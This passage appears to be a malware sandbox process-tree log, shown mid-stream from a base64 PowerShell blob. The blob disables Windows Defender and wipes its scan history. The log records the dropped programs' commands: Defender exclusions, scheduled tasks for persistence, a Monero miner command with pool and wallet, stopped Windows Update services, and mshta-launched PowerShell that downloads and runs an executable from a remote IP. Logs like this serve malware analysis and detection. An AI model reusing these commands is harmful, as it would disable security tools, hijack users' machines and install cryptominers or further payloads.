FsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==7⤵PID:2984
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend8⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"8⤵PID:5504
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups8⤵PID:4364
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller8⤵PID:4788
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass8⤵PID:5020
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"4⤵PID:3904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=5⤵
- Command and Scripting Interpreter: PowerShell
PID:3416
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6560
-
-
C:\Program Files\RuntimeApp\0000028441.exe"C:\Program Files\RuntimeApp\0000028441.exe"5⤵PID:6700
-
-
-
C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"4⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6808
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:6388
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3696 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6428
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"6⤵PID:4688
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll7⤵PID:6096
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b147⤵PID:6844
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"4⤵PID:5116
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:6252
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"4⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"5⤵PID:10048
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
PID:9864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:9716
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:9620
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:9708
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:9640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:9576
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:9536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:9496
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
PID:9448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
PID:9440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
PID:9436
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
PID:9424
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe6⤵PID:9416
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsAutHost"6⤵
- Launches sc.exe
PID:9364
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"6⤵
- Launches sc.exe
PID:9192
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:8408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsAutHost"6⤵
- Launches sc.exe
PID:8396
-
-
-
C:\Users\Admin\AppData\Local\Temp\debuger.exe"C:\Users\Admin\AppData\Local\Temp\debuger.exe"5⤵PID:6956
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:3476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222760101\a41389cfd3.exe"C:\Users\Admin\AppData\Local\Temp\10222760101\a41389cfd3.exe"4⤵PID:3460
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn aAL63masnYq /tr "mshta C:\Users\Admin\AppData\Local\Temp\RnyGgrk1l.hta" /sc minute /mo 25 /ru "Admin" /f5⤵PID:6040
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn aAL63masnYq /tr "mshta C:\Users\Admin\AppData\Local\Temp\RnyGgrk1l.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:6084
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\RnyGgrk1l.hta5⤵PID:5196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EYAJDMSH9ELP7VLJLKIPNYGJAKQYQSL5.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
PID:4464 -
C:\Users\Admin\AppData\Local\TempEYAJDMSH9ELP7VLJLKIPNYGJAKQYQSL5.EXE"C:\Users\Admin\AppData\Local\TempEYAJDMSH9ELP7VLJLKIPNYGJAKQYQSL5.EXE"7⤵PID:4380
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "4⤵PID:2516
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- Delays execution with timeout.exe
PID:6744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵PID:2232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:6348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵PID:17376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:17068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵PID:11132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:11116
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "298c7majvQN" /tr "mshta \"C:\Temp\.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:10780
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\.hta"5⤵PID:10768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
PID:10688 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵PID:10348
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"4⤵PID:6664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\backup.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\backup\""5⤵
- Command and Scripting Interpreter: PowerShell
PID:17092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10223440101\4fdbb88e18.exe"C:\Users\Admin\AppData\Local\Temp\10223440101\4fdbb88e18.exe"4⤵PID:10960
-
-
C:\Users\Admin\AppData\Local\Temp\10223450101\aeb8849f4b.exe"C:\Users\Admin\AppData\Local\Temp\10223450101\aeb8849f4b.exe"4⤵PID:10112
-
-
C:\Users\Admin\AppData\Local\Temp\10223460101\f157ef983f.exe"C:\Users\Admin\AppData\Local\Temp\10223460101\f157ef983f.exe"4⤵PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\10223470101\d05c1e005d.exe"C:\Users\Admin\AppData\Local\Temp\10223470101\d05c1e005d.exe"4⤵PID:15224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x8387.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x8387.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe1⤵
- Executes dropped EXE
PID:2496
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6120 -
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3600
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3276
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4316
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4040
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4688
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3432 -ip 34321⤵PID:5660
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2368
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4924
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1856
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2148
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:464
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1708
-
